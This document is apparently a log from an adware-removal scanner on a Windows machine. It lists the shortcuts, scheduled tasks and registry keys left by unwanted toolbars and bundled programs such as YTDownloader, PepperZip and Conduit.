File Found : C:\Users\Nexus Media Server\Desktop\PepperZip.lnk
File Found : C:\Users\Nexus Media Server\Desktop\SpeedAnalysis.lnk
File Found : C:\Users\Nexus Media Server\Desktop\Sync Folder.lnk
File Found : C:\Users\Nexus Media Server\Desktop\YTDownloader.lnk
File Found : C:\Users\Nexus Media Server\Desktop\Continue GamesDesktop Uninstaller.lnk
File Found : C:\Users\Nexus Media Server\Desktop\Continue Games Desktop.lnk
File Found : C:\Users\Public\Desktop\Knctr.lnk
File Found : C:\Windows\SysNative\ImhxxpComm.dll
File Found : C:\Windows\SysNative\drivers\netmon_wfp.sys
 
***** [ DLL ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
Task Found : LaunchApp
Task Found : YTDownloader
Task Found : YTDownloaderUpd
Task Found : web_disco_notification_service
Task Found : Microsoft\Windows\Multimedia\SMupdate3
Task Found : Microsoft\Windows\Maintenance\SMupdate2
Task Found : GoogleUpdateTaskUserM_1_7_22_478699874-4155726479-3780505679-3006UA__333630343534353131342d235b783432415b45345a2d6c
 
***** [ Registry ] *****
 
Key Found : HKLM\SOFTWARE\Classes\*\shell\filescout
Key Found : HKLM\SOFTWARE\Classes\Prod.cap
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [mobilegeni daemon]
Value Found : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [YTDownloader]
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\YTDownloader.exe
Key Found : HKLM\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\SysMenuExt
Key Found : HKLM\SOFTWARE\Classes\AppID\SysMenu.DLL
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zlib.Adler
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zlib.ZlibCodec
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zlib.ZlibException
Key Found : HKLM\SOFTWARE\Classes\MPCBContextMenu.ContextMenu
Key Found : HKLM\SOFTWARE\Classes\MPCBContextMenu.IconGenerator
Key Found : HKLM\SOFTWARE\Classes\Record\{37AC0F3B-749F-3B22-811B-5A019EED2E85}
Key Found : HKLM\SOFTWARE\Classes\Record\{4392A6CC-7940-310E-8E16-799A8D93A438}
Key Found : HKLM\SOFTWARE\Classes\Record\{66DF7821-ED6D-3534-893C-0E89E74B0F91}
Key Found : HKLM\SOFTWARE\Classes\Record\{755CAFCC-F016-3B06-8F22-945EAA3AD10D}
Key Found : HKLM\SOFTWARE\Classes\Record\{76552F88-640C-314D-82B6-0D8A740907F7}
Key Found : HKLM\SOFTWARE\Classes\Record\{05660A04-00F1-3A04-AB3B-BC1074B84D67}
Key Found : HKLM\SOFTWARE\Classes\Record\{903F9872-E87F-3B74-83B0-DBE10073B29D}
Key Found : HKLM\SOFTWARE\Classes\Record\{9558EEB4-CDA6-3778-B53B-98076F0A1E90}
Key Found : HKLM\SOFTWARE\Classes\Record\{B25AA9BA-FD52-3E5E-BFE3-9B106779DA6E}
Key Found : HKLM\SOFTWARE\Classes\Record\{C852CF9F-37DC-35AC-926A-7E6CFFF7C501}
Key Found : HKLM\SOFTWARE\Classes\Record\{C9777796-4378-3C90-B52D-7238FFFC2A5C}
Key Found : HKLM\SOFTWARE\Classes\Record\{DB1BC8B2-FDBF-30E7-BE1C-AFF9160059E6}
Key Found : HKLM\SOFTWARE\Classes\Record\{F3D5729C-7DEB-3850-A026-D0E323ECFEF5}
Key Found : HKLM\SOFTWARE\Classes\Record\{FEC70973-CB8B-351C-8047-CAE1274CE249}
Key Found : HKLM\SOFTWARE\Classes\Ionic.Crc.CRC32
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zip.BadCrcException
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zip.BadPasswordException
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zip.BadReadException
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zip.BadStateException
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zip.ComHelper
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zip.ReadOptions
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zip.SelfExtractorSaveOptions
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zip.SfxGenerationException
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zip.ZipEntry
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zip.ZipException
Key Found : HKLM\SOFTWARE\Classes\Ionic.Zip.ZipFile
Key Found : HKLM\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\MPCBContextMenu
Key Found : HKCU\Software\Classes\PepperZip
Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Itibiti.exe]
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\VideoPerformer.exe
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PepperZip.exe
Key Found : HKLM\SOFTWARE\Classes\BrowserHTM
Value Found : HKLM\SOFTWARE\Classes\.xht\OpenWithProgIDs [BrowserHTM]
Value Found : HKLM\SOFTWARE\Classes\.webp\OpenWithProgIDs [BrowserHTM]
Value Found : HKLM\SOFTWARE\Classes\.shtml\OpenWithProgIDs [BrowserHTM]
Value Found : HKLM\SOFTWARE\Classes\.html\OpenWithProgIDs [BrowserHTM]
Value Found : HKLM\SOFTWARE\Classes\.htm\OpenWithProgIDs [BrowserHTM]
Key Found : HKLM\SOFTWARE\Classes\CLSID\ForeceRemove
Key Found : HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\browser.exe
Key Found : HKLM\SOFTWARE\Classes\AniGIFCtrl.AniGIF
Key Found : HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg
Key Found : HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg.1
Key Found : HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2
Key Found : HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2.1
Key Found : HKLM\SOFTWARE\Classes\P30a187df_e814_44d3_b4a4_2fbe475dba03_.P30a187df_e814_44d3_b4a4_2fbe475dba03_
Key Found : HKLM\SOFTWARE\Classes\P30a187df_e814_44d3_b4a4_2fbe475dba03_.P30a187df_e814_44d3_b4a4_2fbe475dba03_.9
Key Found : HKLM\SOFTWARE\Classes\PaRiiceDownllOadeir.PaRiiceDownllOadeir
Key Found : HKLM\SOFTWARE\Classes\PaRiiceDownllOadeir.PaRiiceDownllOadeir.2.4
Key Found : HKLM\System\CurrentControlSet\Services\Eventlog\Application\Update Hatchiho
Key Found : HKLM\System\CurrentControlSet\Services\Eventlog\Application\Util Hatchiho
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [Plus-HD-1.2-bg.exe]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [Object Browser-bg.exe]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [iWebar-bg.exe]
Key Found : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKLM\SOFTWARE\5f558f8db334ea14
Key Found : HKLM\SOFTWARE\74ed1f33-1353-c366-d984-ccbd88bb8dd2
Key Found : HKLM\SOFTWARE\Classes\AppID\{FCF8BFD3-39B8-4370-B464-EC2AAACD97CF}
Key Found : HKLM\SOFTWARE\Classes\AppID\{9CB2CD61-FFA0-406C-9D2D-8FDE6F4A4D8A}
Key Found : HKLM\SOFTWARE\Classes\AppID\{D813D5BB-EBC7-45F9-B8A4-36A305168069}
Key Found : HKCU\Software\Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}
Key Found : HKCU\Software\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
Key Found : HKCU\Software\Classes\CLSID\{E4B02201-EA08-35F8-DE8D-19BB02BBFA9D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{AF175732-0D59-716D-F757-9F1492D808D9}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{3070CF0C-F396-3DCA-87D6-9DBF3D77B610}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{4529EB14-6B38-3CC4-9504-6EAB6C9E1255}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{BEEA930F-CD8A-341E-B6B5-5BAF659685D5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F03955F1-309E-34E9-A021-1399C3532273}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{2097A1B6-E86A-4072-A32D-2249A3ECBC5A}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D879A501-50A7-BEFC-A4C5-32DC6E0CB208}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{B33BD6CF-BF4C-4CF0-AC84-B2974BC14ABD}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{30a187df-e814-44d3-b4a4-2fbe475dba03}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F0CBFF50-E1B1-C90B-77E7-6BEC1C577F25}
Key Found : HKLM\SOFTWARE\Classes\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}
Key Found : HKLM\SOFTWARE\Classes\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}
Key Found : HKLM\SOFTWARE\Classes\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}
Key Found : HKLM\SOFTWARE\Classes\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}
Key Found : HKLM\SOFTWARE\Classes\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}
Key Found : HKLM\SOFTWARE\Classes\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}
Key Found : HKLM\SOFTWARE\Classes\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}
Key Found : HKLM\SOFTWARE\Classes\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}
Key Found : HKLM\SOFTWARE\Classes\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}
Key Found : HKLM\SOFTWARE\Classes\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}
Key Found : HKLM\SOFTWARE\Classes\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}
Key Found : HKLM\SOFTWARE\Classes\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}
Key Found : HKLM\SOFTWARE\Classes\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}
Key Found : HKLM\SOFTWARE\Classes\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}
Key Found : HKLM\SOFTWARE\Classes\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}
Key Found : HKLM\SOFTWARE\Classes\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}
Key Found : HKLM\SOFTWARE\Classes\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}
Key Found : HKLM\SOFTWARE\Classes\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}
Key Found : HKLM\SOFTWARE\Classes\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}
Key Found : HKLM\SOFTWARE\Classes\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}
Key Found : HKLM\SOFTWARE\Classes\Interface\{A6D54287-7939-466A-8579-92546D946C8C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}
Key Found : HKLM\SOFTWARE\Classes\Interface\{0079F2AC-4B9D-47BB-845C-752AC0708644}
Key Found : HKLM\SOFTWARE\Classes\Interface\{09B003D5-0209-4B9E-88DA-6AB5226F04F3}
Key Found : HKLM\SOFTWARE\Classes\Interface\{0C8936A4-FCD5-4393-806B-83EAF53EADEC}
Key Found : HKLM\SOFTWARE\Classes\Interface\{0F127439-A377-4E4E-A876-BC54C7C4F9B8}
Key Found : HKLM\SOFTWARE\Classes\Interface\{12CE3764-B926-43C4-9462-CE5ED374CEEB}
Key Found : HKLM\SOFTWARE\Classes\Interface\{154FDDA9-A1AE-43C9-87D3-A0090EB8F50B}
Key Found : HKLM\SOFTWARE\Classes\Interface\{191F1F24-6CD9-4CC9-8CF7-1006772638D5}
Key Found : HKLM\SOFTWARE\Classes\Interface\{222CA129-A00B-4327-AE22-B50A904AC499}
Key Found : HKLM\SOFTWARE\Classes\Interface\{29C26002-10DE-4440-AB58-588CDCAE63C2}
Key Found : HKLM\SOFTWARE\Classes\Interface\{37EE300B-C387-4C91-9AF2-884D1C8C2E52}
Key Found : HKLM\SOFTWARE\Classes\Interface\{45EC1006-A536-4A2D-BE5B-76FE7DBD89DE}
Key Found : HKLM\SOFTWARE\Classes\Interface\{507C93E2-0D1D-4D4E-BE83-FA90EF8BA7EF}
Key Found : HKLM\SOFTWARE\Classes\Interface\{55F90AE6-809C-4126-870A-74E892EE0CEE}
Key Found : HKLM\SOFTWARE\Classes\Interface\{76C5E0A3-B072-4ED0-AAB1-E8B6F063155A}
Key Found : HKLM\SOFTWARE\Classes\Interface\{93B6DC2C-CB0A-47F5-9041-2BFB779380C6}
Key Found : HKLM\SOFTWARE\Classes\Interface\{984867D2-02A9-4039-918A-F209F0A70F9C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{9EEC5519-591B-4F67-9E22-2C18C01E0699}
Key Found : HKLM\SOFTWARE\Classes\Interface\{A7D7CEFD-AEAC-4C31-B0C5-7F44A722CD71}
Key Found : HKLM\SOFTWARE\Classes\Interface\{AC5090B9-9FFA-48F7-8011-A70E000B85E0}
Key Found : HKLM\SOFTWARE\Classes\Interface\{C7CA0368-A12C-4575-AC50-CE1734049FF2}
Key Found : HKLM\SOFTWARE\Classes\Interface\{DC8583CD-B5DB-4C6F-859B-A878C3214770}
Key Found : HKLM\SOFTWARE\Classes\Interface\{DCE2755B-E4D2-4594-B955-18E2E0E4AE38}
Key Found : HKLM\SOFTWARE\Classes\Interface\{F147CC38-435E-4362-B344-DE6C77EAE3E7}
Key Found : HKLM\SOFTWARE\Classes\Interface\{FDAD10B2-FDBC-4870-BA93-D9E9373C350A}
Key Found : HKLM\SOFTWARE\Classes\Interface\{E4C3E50F-5761-4BF8-95A0-939A819DF1C3}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{A0EE0278-2986-4E5A-884E-A3BF0357E476}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{598DCD74-3F5B-4E16-8749-057F426F232A}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{5D9FB48A-5CE2-4118-B19F-F88ADDB0F814}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{ADA38E4E-F20A-4399-BE91-E260AC341C69}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{C1EC170E-C5ED-4100-9078-559C31AFDBF5}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{C4D1C553-99C0-48E5-B0A7-B1E00163715C}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{DC4101EC-F2D3-4648-A1F6-B4EECC52443A}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{9AE7A6AE-162E-44C4-9A2B-A6B4EF19909D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{4723AAA8-B2F9-4CC1-9E60-190976DB1FA4}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{30a187df-e814-44d3-b4a4-2fbe475dba03}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F0CBFF50-E1B1-C90B-77E7-6BEC1C577F25}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{4723AAA8-B2F9-4CC1-9E60-190976DB1FA4}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F0CBFF50-E1B1-C90B-77E7-6BEC1C577F25}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{30a187df-e814-44d3-b4a4-2fbe475dba03}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{F0CBFF50-E1B1-C90B-77E7-6BEC1C577F25}
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35B-6118-11DC-9C72-001320C79847}]
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35C-6118-11DC-9C72-001320C79847}]
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{EEE6C367-6118-11DC-9C72-001320C79847}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{17a1668a-3eeb-437f-8b25-9d7206eae93d}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{253d390a-8412-4b6d-86d4-e3cac4fdd5ca}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{020B1D4B-5738-4C77-9E19-4F173DD9B486}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{3070CF0C-F396-3DCA-87D6-9DBF3D77B610}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{4529EB14-6B38-3CC4-9504-6EAB6C9E1255}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{BEEA930F-CD8A-341E-B6B5-5BAF659685D5}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{F03955F1-309E-34E9-A021-1399C3532273}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{2097A1B6-E86A-4072-A32D-2249A3ECBC5A}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{00000000-BA82-4612-BE43-95B8B482C269}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{B33BD6CF-BF4C-4CF0-AC84-B2974BC14ABD}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{30a187df-e814-44d3-b4a4-2fbe475dba03}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{F0CBFF50-E1B1-C90B-77E7-6BEC1C577F25}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{0079F2AC-4B9D-47BB-845C-752AC0708644}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{09B003D5-0209-4B9E-88DA-6AB5226F04F3}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{0C8936A4-FCD5-4393-806B-83EAF53EADEC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{0F127439-A377-4E4E-A876-BC54C7C4F9B8}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{12CE3764-B926-43C4-9462-CE5ED374CEEB}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{154FDDA9-A1AE-43C9-87D3-A0090EB8F50B}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{191F1F24-6CD9-4CC9-8CF7-1006772638D5}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{222CA129-A00B-4327-AE22-B50A904AC499}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{29C26002-10DE-4440-AB58-588CDCAE63C2}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{37EE300B-C387-4C91-9AF2-884D1C8C2E52}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{45EC1006-A536-4A2D-BE5B-76FE7DBD89DE}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{507C93E2-0D1D-4D4E-BE83-FA90EF8BA7EF}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{55F90AE6-809C-4126-870A-74E892EE0CEE}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{76C5E0A3-B072-4ED0-AAB1-E8B6F063155A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{93B6DC2C-CB0A-47F5-9041-2BFB779380C6}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{984867D2-02A9-4039-918A-F209F0A70F9C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{9EEC5519-591B-4F67-9E22-2C18C01E0699}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{A7D7CEFD-AEAC-4C31-B0C5-7F44A722CD71}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{AC5090B9-9FFA-48F7-8011-A70E000B85E0}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{C7CA0368-A12C-4575-AC50-CE1734049FF2}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{DC8583CD-B5DB-4C6F-859B-A878C3214770}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{DCE2755B-E4D2-4594-B955-18E2E0E4AE38}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{F147CC38-435E-4362-B344-DE6C77EAE3E7}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{FDAD10B2-FDBC-4870-BA93-D9E9373C350A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E4C3E50F-5761-4BF8-95A0-939A819DF1C3}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{17a1668a-3eeb-437f-8b25-9d7206eae93d}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{253d390a-8412-4b6d-86d4-e3cac4fdd5ca}
Key Found : HKCU\Software\Conduit
Key Found : HKCU\Software\eSupport.com
Key Found : HKCU\Software\GlobalUpdate
Key Found : HKCU\Software\IM
Key Found : HKCU\Software\InstalledBrowserExtensions
Key Found : HKCU\Software\PepperZip
Key Found : HKCU\Software\performersoft llc
Key Found : HKCU\Software\SoftwareUpdater
Key Found : HKCU\Software\tuguu sl
Key Found : HKCU\Software\Tutorials
Key Found : HKCU\Software\WNLT
Key Found : HKCU\Software\YTDownloader
Key Found : HKCU\Software\DriverToolkit
Key Found : HKCU\Software\subpar
Key Found : HKCU\Software\Browser
Key Found : HKCU\Software\OffersWizard
Key Found : HKCU\Software\MPC
Key Found : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Key Found : HKCU\Software\AppDataLow\Software\BackgroundContainer
Key Found : HKCU\Software\AppDataLow\Software\Conduit
Key Found : HKCU\Software\AppDataLow\Software\Object Browser
Key Found : HKCU\Software\AppDataLow\Software\BackgroundContainerV2
Key Found : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
Key Found : HKLM\SOFTWARE\Boost
Key Found : HKLM\SOFTWARE\Conduit
Key Found : HKLM\SOFTWARE\DnsBasic
Key Found : HKLM\SOFTWARE\GlobalUpdate
Key Found : HKLM\SOFTWARE\InstalledBrowserExtensions
Key Found : HKLM\SOFTWARE\YTDownloader
Key Found : HKLM\SOFTWARE\VideoPlayerV3
Key Found : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
Key Found : HKLM\SOFTWARE\IGS
Key Found : HKLM\SOFTWARE\SearchModule
Key Found : HKLM\SOFTWARE\Universal
Key Found : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2D471A31-4FA7-95BA-1880-D441113ED736}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2DF3E224-05CD-4113-AA7A-86F2F6607B46}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F488658-35A7-2AB8-A756-560BA8F103C3}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{779D1843-0043-65D2-D781-8614F17B6222}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C60D3D4E-3B20-5AB3-7F2C-9C946AD4080F}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DnsBasic
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PepperZip
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B6D700D3-3D0D-FEEB-D675-2CE78F9EC5D6}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A3FC46A0-9B62-0EF3-B475-743B3A2762B1}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{194FED75-9C74-BDB7-53F8-8CFFEF1AFEC9}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BE360B8B-0F10-CA89-FC84-A5EAB71A6AF8}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F1422DAA-0829-09A1-7536-73936CAB8FFA}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{70BD2558-27DA-8B02-02D0-D8704ECD2EDF}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{532970A2-464B-73CB-BBC4-F209EAD3EEBE}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{80E8B0A0-117D-1402-7CDE-688156237115}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CA8C94BE-9F47-1B2E-90F8-D8C07119BD96}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D831E399-50FE-84AE-F5F7-0A63AC282464}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{FE139F4C-CE5B-121A-8A2D-191FA2226094}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7E7FAE3D-3358-D280-8DBF-E8E2D94326D1}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\igsc
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverAgent_is1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D66BF89F-B0A2-48F5-A2E4-242EB645AB76}_is1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B10BC31B-DBC6-56FE-DD3D-DD4E49A3E6CE}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VideoPerformer
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{55d4b236-fe79-4782-cc2d-55acaf147087}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9D9BEFAE-9499-F52B-6CC4-94818CCC2AB5}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
Key Found : [x64] HKLM\SOFTWARE\InstalledBrowserExtensions
Key Found : [x64] HKLM\SOFTWARE\Tarma Installer
Key Found : [x64] HKLM\SOFTWARE\YTDownloader
Key Found : [x64] HKLM\SOFTWARE\SearchModule
Key Found : [x64] HKLM\SOFTWARE\WebBar
Key Found : HKU\.DEFAULT\Software\IBUpdaterService
Key Found : HKU\.DEFAULT\Software\Browser
Key Found : HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
